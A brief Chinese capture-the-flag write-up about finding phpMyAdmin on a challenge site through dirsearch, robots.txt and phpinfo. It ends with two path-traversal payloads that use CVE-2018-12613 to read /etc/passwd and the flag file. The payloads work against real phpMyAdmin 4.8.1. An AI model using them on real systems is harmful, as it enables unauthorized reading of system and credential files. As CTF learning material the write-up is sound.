一开始打开是乱码
之前题目做过修复乱码的,得到这个
用dirsearch扫一下
一开始我是看到robots.txt
访问一下
访问一下phpinfo
也没啥,看到phpmyadimin
访问一下
没啥思路,看了wp
看到phpMyAdmin 4.8.1后台文件包含漏洞(CVE-2018-12613)https://blog.csdn.net/qq_45521281/article/details/105780497
直接利用
?target=db_datadict.php%253f/../../../../../../../../etc/passwd
/?target=db_datadict.php%253f../../../../../../../../../../flag